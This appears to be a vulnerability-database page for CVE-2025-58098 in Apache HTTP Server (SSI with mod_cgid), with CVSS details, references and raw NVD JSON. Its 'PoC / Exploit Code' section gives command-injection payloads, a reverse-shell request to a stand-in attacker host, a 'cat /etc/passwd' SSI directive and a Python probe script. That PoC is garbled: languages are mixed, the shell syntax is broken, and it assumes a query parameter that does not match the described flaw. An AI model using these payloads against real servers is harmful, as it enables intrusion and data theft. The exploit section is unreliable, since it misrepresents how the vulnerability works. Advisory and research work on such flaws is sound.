CVE-2025-58098

Description

Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd="..." directives. This issue affects Apache HTTP Server before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* - VULNERABLE

Apache HTTP Server < 2.4.66 (all platforms with mod_cgid and SSI enabled)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Apache HTTP Server SSI #exec cmd Injection PoC -->
<!-- Basic test to verify vulnerability -->
<!-- Send request to a .shtml page with SSI enabled -->

<!-- Example 1: Basic command execution -->
GET /test.shtml?cmd=|whoami HTTP/1.1
Host: target.example.com

<!-- Example 2: Reverse shell connection -->
GET /test.shtml?cmd=|bash -i >& /dev/tcp/attacker/port/0>&1 HTTP/1.1
Host: target.example.com

<!-- Example 3: File read via SSI -->
<!-- In a .shtml page, attacker injects: -->
<!--#exec cmd="cat /etc/passwd"-->

<!-- Python PoC script -->
import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.example.com'
page = '/test.shtml'

# Test basic command injection
payload = '|id'
url = f'{target}{page}?cmd={payload}'

try:
    response = requests.get(url, timeout=10)
    if response.status_code == 200:
        print(f'[+] Target appears vulnerable')
        print(f'[+] Response: {response.text[:500]}')
except Exception as e:
    print(f'[-] Error: {e}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58098
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58098
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58098/
[4] VulDB https://vuldb.com/cve/CVE-2025-58098
[5] https://httpd.apache.org/security/vulnerabilities_24.html
[6] http://www.openwall.com/lists/oss-security/2025/12/04/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58098", "sourceIdentifier": "[email protected]", "published": "2025-12-05T14:15:49.153", "lastModified": "2025-12-08T19:36:05.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd=\"...\" directives.\n\nThis issue affects Apache HTTP Server before 2.4.66.\n\nUsers are recommended to upgrade to version 2.4.66, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.66", "matchCriteriaId": "A3D22F90-E531-4EC1-B581-FF5068BC3A58"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/04/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}